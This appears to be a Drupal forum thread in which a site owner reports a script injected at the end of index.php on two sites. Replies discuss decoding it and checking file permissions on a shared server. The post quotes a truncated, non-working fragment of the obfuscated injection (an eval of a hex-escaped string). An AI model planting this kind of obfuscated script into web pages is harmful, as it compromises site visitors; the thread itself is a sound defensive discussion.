Hi,

I am using drupal 5.3, and have what I think is a security breach on two of my sites in the same server. I first noticed that the sites would not show anything, and found out that it was a script added at the end of index.php which rendered the page useless (at least for me).

This is the first part of the script:

<script>eval(unescape("%77%69%6e%64%6f%77...........%27%29")); </script>

I removed a good part of it just in case; I have no idea where it came from. Anybody have any encounters of this kind?

Thanks in advance

Comments

mooffie’s picture

You may want to paste that code into a URL decoder to try to learn more.

it was a script added at the end of index.php

Someone has write access to your files. (You should have checked the 'last modified' timestamp on this file to see when it happened.) Are you using shared hosting? Maybe some other user on that server is evil. You should check the permissions of the folder containing this file and of this file to see if you grant 'write' access to anybody else.

(There's a lesser chance that this modification originated in code run by Drupal, because the server user usually don't have permission to write to this file.)

I think what might be a Security breach

It's probably not a security breach in Drupal itself, but it sure is in your site.

Note that security matters should be discussed privately, here.

faunapolis’s picture

I think this was a breach at the server level. As apparently some other sites in the same server had the same problem. Thank you very much,

http://www.faunapolis.org/